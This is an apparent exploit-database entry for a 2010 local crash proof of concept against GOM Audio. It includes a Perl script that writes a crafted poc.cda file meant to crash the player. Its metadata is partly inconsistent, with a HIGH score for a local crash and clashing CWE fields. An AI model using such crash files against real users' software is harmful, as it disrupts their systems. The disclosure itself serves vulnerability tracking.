header-logo
Suggest Exploit
vendor:
GOM Audio
by:
applicationlayer@gmail.com
7,5
CVSS
HIGH
Local crash
119
CWE
Product Name: GOM Audio
Affected Version From: all versions
Affected Version To: all versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

GOM Audio Local crash poc

A proof-of-concept exploit for a local crash vulnerability in GOM Audio was published in 2010. The exploit creates a file named 'poc.cda' and writes 10 'A' characters to it, which causes the application to crash.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

# Exploit Title: [GOM Audio Local crash poc]
# Date: [2010.01.05]
# Author: [applicationlayer@gmail.com]
# Version: [all versions]
# Tested on: [xp sp3]
#!usr/bin/perl
$file="poc.cda";
$boom="A" x 10;
open(myfile,">>$file");
print myfile $boom;
close(myfile);